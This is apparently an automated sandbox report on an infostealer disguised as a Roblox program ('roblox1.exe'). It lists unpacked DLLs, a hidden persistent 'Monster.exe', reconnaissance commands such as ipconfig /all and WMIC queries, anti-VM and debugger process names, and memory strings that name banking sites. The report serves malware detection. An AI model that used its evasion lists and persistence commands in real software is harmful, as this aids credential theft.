                  Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1966370178.00007FFBBC9F3000.00000002.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1952475865.00007FFBA9E5C000.00000002.00000001.01000000.00000019.sdmp
                  Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: roblox1.exe, 00000000.00000003.1539994673.000001B301567000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953260784.00007FFBA9EE5000.00000002.00000001.01000000.00000013.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: stub.exe, 00000003.00000002.1963629139.00007FFBB5CBD000.00000002.00000001.01000000.00000012.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: cryptography_rust.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: stub.exe, 00000003.00000002.1965708695.00007FFBBC246000.00000002.00000001.01000000.00000018.sdmp
                  Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: stub.exe, 00000003.00000002.1954163213.00007FFBAA1F1000.00000002.00000001.01000000.00000014.sdmp
                  Source: Binary string: C:\A\40\b\bin\amd64\pyexpat.pdb source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp
                  Source: vcruntime140.dll.0.dr Static PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
                  Source: roblox1.exe Static PE information: section name: .eh_fram
                  Source: roblox1.exe Static PE information: section name: .xdata
                  Source: libcrypto-1_1.dll.0.dr Static PE information: section name: .00cfg
                  Source: libssl-1_1.dll.0.dr Static PE information: section name: .00cfg
                  Source: stub.exe.0.dr Static PE information: section name: .eh_fram
                  Source: stub.exe.0.dr Static PE information: section name: .xdata
                  Source: python310.dll.0.dr Static PE information: section name: PyRuntim
                  Source: vcruntime140.dll.0.dr Static PE information: section name: _RDATA
                  Source: Monster.exe.3.dr Static PE information: section name: .eh_fram
                  Source: Monster.exe.3.dr Static PE information: section name: .xdata
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 56_2_00007FFB496400BD pushad ; iretd 56_2_00007FFB496400C1

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python3.dll
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libssl-1_1.dll
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libffi-7.dll
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\python310.dll
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe File created: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\libcrypto-1_1.dll
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\vcruntime140.dll
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pyd
                  Source: C:\Users\user\Desktop\roblox1.exe File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pyd
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\sqlite3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\roblox1.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pydJump to dropped file
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\tasklist.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\taskkill.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\systeminfo.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\netsh.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                  Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Description, ProviderName FROM Win32_LogicalDisk
                  Source: C:\Windows\System32\wbem\WMIC.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Caption, Command FROM Win32_StartupCommand
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROCESSHACKER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UFIDDLER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: USBIEDLL.DLLUANTIVM.CHECKDLLT
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OLLYDBG.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: QEMU-GA.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UXENSERVICE.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: VMUSRVC.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UWIRESHARK.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UOLLYDBG.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: FIDDLER.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: XENSERVICE.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: USBIEDLL.DLL
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UVMTOOLSD.EXEUVMWARETRAY.EXEUVMACTHLP.EXEUVBOXTRAY.EXEUVBOXSERVICE.EXEUVMSRVC.EXEUPRL_TOOLS.EXEUXENSERVICE.EXEUANTIVM.CHECKPROCESST
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UPROCESSHACKER.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UQEMU-GA.EXE
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: UVMUSRVC.EXE
                  Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: WIRESHARK.EXE
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2731
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3756
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4651
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2438
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_lzma.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_helpers_c.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_hashlib.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_helpers.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\pyexpat.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\frozenlist\_frozenlist.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict\_multidict.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\cryptography\hazmat\bindings\_rust.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_sqlite3.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_writer.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_queue.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_multiprocessing.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_decimal.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_overlapped.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\yarl\_quoting_c.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_cffi_backend.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_bz2.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_uuid.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_http_parser.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ctypes.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\unicodedata.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\aiohttp\_websocket.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_socket.pyd
Source: C:\Users\user\Desktop\roblox1.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\select.pyd
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; API coverage: 0.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788; Thread sleep count: 2731 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788; Thread sleep count: 3756 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3776; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5424; Thread sleep count: 4651 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1608; Thread sleep count: 2438 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5588; Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5712; Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\systeminfo.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\cmd.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\wbem\WMIC.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\systeminfo.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\Desktop\roblox1.exe; File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
Source: stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: Hyper-V
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: VMware
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: AMC password management pageVMware20,11696494690
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmusrvc.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: *Hyper-V Administrators
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: qemu-ga.exe
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940721109.00000213BE12E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940139383.00000213BE111000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmwareuser.exe
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: uvmtoolsd.exeuvmwaretray.exeuvmacthlp.exeuvboxtray.exeuvboxservice.exeuvmsrvc.exeuprl_tools.exeuxenservice.exeuAntiVM.CheckProcessT
Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: aqemu
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: avirtualboxavmwareuAntiVM.CheckGpuadecoded_outputu<genexpr>uAntiVM.CheckGpu.<locals>.<genexpr>L
Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp; Binary or memory string: avmware
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: tasks.office.comVMware20,11696494690o
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmwareuser.exe
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll4
Source: stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: vmware
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: stub.exe, 00000003.00000003.1934773835.00000213BEF56000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEFA7000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916597357.00000213BEFA8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937895294.00000213BEF66000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916380810.00000213BEF50000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916914578.00000213BEF51000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
Source: stub.exe, 00000003.00000003.1693227187.00000213BEE57000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: global block list test formVMware20,11696494690
